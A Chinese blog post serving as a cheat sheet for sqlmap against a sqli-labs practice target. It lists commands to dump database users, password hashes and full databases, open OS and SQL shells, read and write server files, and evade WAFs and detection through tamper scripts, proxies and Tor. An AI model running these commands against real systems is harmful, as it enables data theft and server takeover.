sqlmap使用总结

最新推荐文章于 2024-04-15 22:23:32 发布
最新推荐文章于 2024-04-15 22:23:32 发布
阅读量557 收藏 1
点赞数
分类专栏: 工具专区 文章标签: sql shell 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46684578/article/details/117804333
版权

sqlmap使用总结

sqlmap功能

  1. 对http不同的字段 探测sql注入漏洞,获取数据库权限,获取数据
  2. 指定脚本(–temper)绕过防火墙
  3. 设置代理,隐藏网络,避免被检测
  4. getshell,获取系统权限,sql权限等。上传文件,下载文件
  5. 反弹msf的shell(–os-pwn)
  6. 网页爬虫,探测指纹信息

1. 基本用法

sqlmap -r http.txt  #http.txt是我们抓取的http的请求包

sqlmap -r http.txt -p username  
	#指定参数,当有多个参数而你又知道username参数存在SQL漏洞,你就可以使用-p指定参数进行探测

sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1"   #探测该url是否存在漏洞

sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" 
	--cookie="抓取的cookie"   #当该网站需要登录时,探测该url是否存在漏洞

sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --data="uname=admin&passwd=admin&submit=Submit"  
	#抓取其post提交的数据填入

sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --users      #查看数据库的所有用户

sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --passwords  #查看数据库用户名的密码

sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --current-user  #查看数据库当前的用户

sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --is-dba    #判断当前用户是否有管理员权限

sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --roles     
	#列出数据库所有管理员角色,仅适用于oracle数据库的时候

sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1"  --dbs        #爆出所有的数据库

sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1"  --tables     #爆出所有的数据表

sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1"  --columns    #爆出数据库中所有的列

sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1"  --current-db 	#查看当前的数据库

sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --tables 
	#爆出数据库security中的所有的表

sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --columns 
	#爆出security数据库中users表中的所有的列

sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users -C username --dump  
	#爆出数据库security中的users表中的username列中的所有数据

sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --dump-all 
	#爆出数据库security中的users表中的所有数据

sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --dump-all   
	#爆出数据库security中的所有数据

sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --dump-all  
	#爆出该数据库中的所有数据

sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --tamper=space2comment.py  
	#指定脚本进行过滤,用/**/代替空格

sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --level=5 --risk=3 
	#探测等级5,平台危险等级3,都是最高级别。当level=2时,会测试cookie注入。
	当level=3时,会测试user-agent/referer注入。

sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --sql-shell  #执行指定的sql语句

sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --os-shell/--os-cmd   
	#执行--os-shell命令,获取目标服务器权限	

sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --file-read "c:/test.txt" 
	#读取目标服务器C盘下的test.txt文件

sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --file-write  test.txt  --file-dest "e:/hack.txt"  
	#将本地的test.txt文件上传到目标服务器的E盘下,并且名字为hack.txt

sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --dbms="MySQL"     
	#指定其数据库为mysql Firebird, HSQLDB, IBM DB2, Informix, Microsoft Access, Microsoft SQL 
	Server, MySQL, Oracle, PostgreSQL, SAP MaxDB, SQLite, Sybase

sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --random-agent   #使用任意的User-Agent爆破

sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --proxy="http://127.0.0.1:8080"    #指定代理

sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --technique T    
	#指定时间延迟注入,这个参数可以指定sqlmap使用的探测技术,
	默认情况下会测试所有的方式,当然,我们也可以直接手工指定。

支持的探测方式如下:

  B: Boolean-based blind SQL injection(布尔型注入)

  E: Error-based SQL injection(报错型注入)

  U: UNION query SQL injection(可联合查询注入)

  S: Stacked queries SQL injection(可多语句查询注入)

  T: Time-based blind SQL injection(基于时间延迟注入)



-v3                   #输出详细度  最大值5 会显示请求包和回复包

--threads 5           #指定线程数

--fresh-queries       #清除缓存

--flush-session       #清空会话,重构注入

--batch               #对所有的交互式的都是默认的

--random-agent        #任意的http头

--tamper base64encode            #对提交的数据进行base64编码

--referer http://www.baidu.com   #伪造referer字段

--keep-alive     
	保持连接,当出现 [CRITICAL] connection dropped or unknown HTTP status code received. 
	sqlmap is going to retry the request(s) 保错的时候,使用这个参数

2. 使用sqlmap探测waf并绕过

--identify-waf   检测是否有WAF

#使用参数进行绕过

--random-agent    使用任意HTTP头进行绕过,尤其是在WAF配置不当的时候

--time-sec=3      使用长的延时来避免触发WAF的机制,这方式比较耗时

--hpp             使用HTTP 参数污染进行绕过,尤其是在ASP.NET/IIS 平台上

--proxy=100.100.100.100:8080 --proxy-cred=211:985      使用代理进行绕过

--ignore-proxy    禁止使用系统的代理,直接连接进行注入

--flush-session   清空会话,重构注入

--hex 或者 --no-cast     进行字符码转换

--mobile          对移动端的服务器进行注入

--tor             匿名注入

3. python脚本绕过网站

有些时候网站会过滤掉各种字符,可以用tamper来解决(对付某些waf时也有成效

sqlmap  --tamper=space2comment.py  #用/**/代替空格
sqlmap  --tamper="space2comment.py,space2plus.py"  指定多个脚本进行过滤

在sqlmap的temper目录下
在这里插入图片描述

4. 伪造http referer头部

探测风险等级

--level=LEVEL       设置测试等级(1-5,默认为 1)
--risk=RISK         设置测试风险等级(1-3,默认为 1)

Sqlmap可以在请求中伪造HTTP中的referer,当探测等级为3或者3以上时,会尝试对referer注入,可以使用referer命令来欺骗,比如,我们伪造referer头为百度。

可以这样

referer  http://www.baidu.com

5. 执行语句

sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --sql-shell   #执行sql语句
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --os-shell    #执行--os-shell命令

在数据库为Mysql、PostgreSql或者SQL Server时,执行系统命令的前提条件

网站必须是root权限
攻击者需要知道网站的绝对路径
GPC为off,php主动转义的功能关闭

6. 从数据库读文件

sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --file-read "c:/test.txt" 
#读取目标服务器C盘下的test.txt文件

7. 上传文件到数据库

sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --file-write test.txt --file-dest "c:/payload.txt"  
	#将本地的test.txt文件上传到目标服务器的C盘下,并且名字为payload.txt
Buffedon
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
SQLmap使用总结
Alexz__的博客
02-15 3215
1.简介 2.说明书翻译 3. 基础命令汇总 4.基础命令尝试 5.高级用法 壹 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQLSQLServer、IBM DB2、SQLite、Firebird、Sybase和...
Sqlmap工具使用心得
Lucky小小吴的小屋
01-23 991
在练习sqli-labs靶场时,用到了sqlmap,便记录了下常见的sqlmap指令
sqlmap靶机注入详细教程
最新发布
Pythonit教程网
04-15 1387
基本用法:使用-u参数指定目标URL,例如:sqlmap -u "http://目标网站/?使用-D -T --columns参数列出指定表的所有列。使用-D -T --dump参数导出指定表的所有数据。
SQLMAP使用总结
qq_44657899的博客
05-02 1085
正常注入 python sqlmap.py -r .\test.txt --level 3 --batch --dbs 绕过waf sqlmap.py -r .\test.txt --dbs --batch --tamper space2morehash.py,space2hash.py,base64encode.py,charencode.py 获取可获得信息 sqlmap -r .\test.txt --current-db --current-user --hostname --is-dba
SQL注入(DVWA靶场搭建及使用sqlMap注入、sqlmap问题及解决办法)
tmzy1的博客
03-19 5061
SQL注入(DVWA靶场搭建及使用sqlMap注入、sqlmap问题及解决办法)
sqlmap
bylfsj的博客
09-23 6568
目录 Sqlmap Sqlmap的简单用法 探测指定URL是否存在WAF,并且绕过 探测指定URL是否存在SQL注入漏洞 查看数据库的所有用户 查看数据库所有用户名的密码  查看数据库当前用户  判断当前用户是否有管理权限 列出数据库管理员角色 查看所有的数据库 查看当前的数据库 爆出指定...
sqlmap使用总结1
08-03
1. 用 level1 检测数据库类型 2. 指定数据库为 mysql,级别为 3(共 5 级,级别越高,检测越全面 3. 当 get 的数据被过滤时,就要想到
总结一些SqlMap的常用tamper脚本释义.docx
02-02
一些SqlMap的常用tamper脚本释义
iBatis_SqlMap的配置总结[1]
05-05
iBatis_SqlMap的配置总结,非常有用。
渗透测试必备神器SQLMAP的所有绕waf脚本合集
10-18
总结起来,SQLMAP是一种强大的、能够绕过防火墙检测的工具。它能够帮助你发现并利用应用程序中的SQL注入漏洞,及时修复这些漏洞,确保你的数据安全。所以,如果你想确保你的应用程序免受潜在威胁的影响,那么SQLMA
sqlmap注入命令详解
08-19
使用sqlmap进行数据库注入漏洞测试,高效,快速
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 4235
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
sqlmap靶机实战
qq_46485934的博客
09-10 378
一.寻找目标网站的注入点(靶机实战) 寻找注入点,随机点击一篇文章 url :http://117.167.136.244:28026/index/narticle.php?nid=3099 sql注入测试:http://117.167.136.244:28026/index/narticle.php?nid=3099’ 确定存在注入 二.使用sqlmap sqlmap -u “http://117.167.136.244:28026/index/narticle.php?nid=3094” -dbs
sqlmap测试靶机
weixin_44940180的博客
08-09 447
测试SQL注入 Sqlmap.py -u "http://192.168.3.83/eims_cms_3.5/News.asp?SortID=1&ItemID=49" 可以从下面的测试结果看出此处存在SQL注入以及攻击类型和payload 获取数据库信息GET型 1. 获取数据库名字 sqlmap.py -u "http://192.168.3.3/DVWA/vulnerabilities/sqli/?i=1&Submit=Submit#" --cookie="securit
SQLMap使用详解
未完成的歌~的博客
02-19 2万+
文章目录前言:一、SQLMap介绍1、Sqlmap简介:2、Sqlmap支持的注入方式:二、SQLMap安装三、SQLMap使用:1、判断是否存在注入:2、判断文本中的请求是否存在注入:3、查询当前用户下的所有数据库:4、获取数据库中的表名:5、获取表中的字段名:6、获取字段内容:7、获取数据库的所有用户:8、获取数据库用户的密码:9、获取当前网站数据库的名称:10、获取当前网站数据库的用户名称:四、SQLMap进阶:参数讲解1、-- level 5:探测等级2、-- is-dba:当前用户是否为管理权限3
超详细SQLMap使用攻略及技巧分享(转载)
Larva35的博客
03-01 1171
原地址’https://www.freebuf.com/sectool/164608.html’ sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。 sqlmap目前最新版本为1.1.8-8,相关资源如下: 官方网站:http://sqlmap.org/, 下载地址:https://githu
Sqlmap 使用方法小结
热门推荐
0verWatch的博客
08-02 2万+
平常的使用GET方法像–tables –columns -T -D –dbs –dump 啥的就不说了,只是博客几天不发,空着不好,还是得写写东西 --is-dba 当前用户权限(是否为root权限,mssql下最高权限为sa) --dbs 所有数据库 --current-db 网站当前数据库 --users 所有数据库用户 --current-user 当前数据库用户 --random-age...
sqlmap中的--sql-shell
qq_45751902的博客
10-25 7146
secure_file_priv的值在mysql配置文件my.ini中设置,这个参数用来限制数据导入导出。2、secure_file_priv 的值非NULL或包含了导出的绝对路径。outfile 和 dumpfile的路径不支持hex,必须有引号包裹。4、mysql连接用户有FILE权限/ROOT用户或ROOT权限。Mysql>=5.5.53 默认为NULL,即默认禁止导入导出。3、mysql服务有对网站可访问路径的写权限。5、GPC关闭//未对闭合用的引号转义。1、网站可访问路径的绝对路径。
sqli sqlmap
09-07
SQLi(Structured Query Language Injection)是一种利用Web应用程序中的安全漏洞,将恶意的SQL代码注入到用户输入的数据中的攻击方法。SQLMap是一种常用的自动化SQL注入工具,它可以帮助安全研究人员找到和利用这些漏洞。 使用SQLMap可以进行各种类型的SQL注入攻击,包括盲注和联合查询注入。在进行盲注时,SQLMap会发送一系列的测试语句,通过观察返回的结果来确定注入点的存在和注入语法的正确性。而在联合查询注入中,SQLMap会利用UNION SELECT语句将恶意代码注入到原始查询中,从而获取数据库中的敏感信息。 在使用SQLMap时,可以通过指定URL和一些参数来执行注入测试。例如,在执行基本的盲注测试时,可以使用以下命令:python sqlmap.py -u 127.0.0.1/sqli/less-38/?id= 1.数据库名 python sqlmap.py -u 127.0.0.1/sqli/less-38/?id= --dbs。这将测试目标URL中的参数id是否存在注入漏洞,并尝试获取数据库名称。 除了执行基本的SQL注入测试外,还可以使用SQLMap执行更复杂的攻击,如获取数据库中的表和列信息,以及获取用户表中的用户名和密码等敏感信息。例如,在注入漏洞被确认后,可以使用以下命令来获取用户表中的用户名和密码:python sqlmap.py -u http://localhost/sqli-labs-master/Less-4/?id=1 -D security -T users -C username,password --dump --batch。 总结来说,SQLi是一种通过注入恶意的SQL代码来攻击Web应用程序的方法,而SQLMap是一种常用的自动化SQL注入工具,可以帮助发现和利用这些漏洞,以获取敏感信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Buffedon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值